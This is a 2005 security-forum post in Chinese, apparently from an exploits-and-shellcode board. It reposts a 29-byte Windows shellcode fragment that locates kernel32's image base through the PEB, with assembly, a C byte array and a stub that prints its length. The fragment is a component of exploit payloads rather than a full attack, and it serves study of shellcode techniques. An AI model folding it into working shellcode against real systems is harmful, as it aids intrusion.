Windows 9x/NT/2k/XP PEB method 29 bytes shellcode

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6818
精华: 835
积分: 36108
阅读权限: 255
性别: 男
来自: 中国
在线时间: 579 小时
注册时间: 2004-6-25
最后登录: 2008-7-23

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-7-28 00:14 只看该作者

Windows 9x/NT/2k/XP PEB method 29 bytes shellcode

文章作者：loco

复制内容到剪贴板

代码:

//

// PEB way of getting kernel32 imagebase by loco.

// Compatible with all Win9x/NT based operating systems.

//

// Gives kernel32 imagebase in eax when executing.

// 29 bytes, only eax/esi used.

//

// Originally discovered by Dino Dai Zovi.

//

//



#include <stdio.h>



/*

     xor  eax, eax

     add  eax, fs:[eax+30h]

     js   method_9x



method_nt:

     mov  eax, [eax + 0ch]

     mov  esi, [eax + 1ch]

     lodsd

     mov  eax, [eax + 08h]

     jmp  kernel32_ptr_found



method_9x:

     mov  eax, [eax + 34h]

     lea  eax, [eax + 7ch]

     mov  eax, [eax + 3ch]

kernel32_ptr_found:

*/



unsigned char Shellcode[] =

     "\x33\xC0"       // xor eax, eax

     "\x64\x03\x40\x30"  // add eax, dword ptr fs:[eax+30]

     "\x78\x0C"       // js short $+12

     "\x8B\x40\x0C"    // mov eax, dword ptr [eax+0C]

     "\x8B\x70\x1C"    // mov esi, dword ptr [eax+1C]

     "\xAD"          // lodsd

     "\x8B\x40\x08"    // mov eax, dword ptr [eax+08]

     "\xEB\x09"       // jmp short $+9

     "\x8B\x40\x34"    // mov eax, dword ptr [eax+34]

     "\x8D\x40\x7C"    // lea eax, dword ptr [eax+7C]

     "\x8B\x40\x3C"    // mov eax, dword ptr [eax+3C]

; // = 29 bytes.



int main()

{

     printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1);

     return 1;

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » 毒箭羽翼[ Shellcodez Query ] » Windows 9x/NT/2k/XP PEB method 29 bytes shellcode